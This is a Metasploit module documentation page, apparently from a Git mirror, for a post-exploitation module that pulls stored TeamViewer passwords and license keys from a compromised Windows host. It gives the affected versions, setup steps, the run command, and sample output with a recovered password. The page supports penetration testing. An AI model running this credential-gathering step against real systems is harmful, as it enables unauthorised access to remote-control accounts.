adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/post/windows/gather/credentials/teamviewer_passwords.md
T
Spencer McIntyre 5a62630309 Add installation steps to the module docs
2020-02-07 10:20:17 -05:00

1.3 KiB
Raw Blame History

Vulnerable Application

Any Windows host with a meterpreter session and TeamViewer 7+ installed. The following passwords will be searched for and recovered:

  • Options Password -- All module-supported TeamViewer versions (7+)
  • Unattended Password -- TeamViewer versions 7 - 9
  • License Key -- TeamViewer versions 7 - 14

Installation Steps

  1. Download the latest installer of TeamViewer.
  2. Select "Custom Install With Unattended Password" during installation
  3. After installation, navigate to Extra > Options > Security > Advanced > Show Advanced Settings and set the "Options Password" * Options can also be exported to a .reg file from here.

Verification Steps

  1. Get a meterpreter session on a Windows host.
  2. Do: run post/windows/gather/credentials/teamviewer_passwords
  3. If the system has registry keys for TeamViewer passwords they will be printed out.

Options

None.

Scenarios

meterpreter > run post/windows/gather/credentials/teamviewer_passwords 

[*] Finding TeamViewer Passwords on WEQSQUGO-2156
[+] Found Exported Unattended Password: P@$$w0rd
[+] Found Options Password: op*****5
[+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
meterpreter >
Reference in New Issue View Git Blame Copy Permalink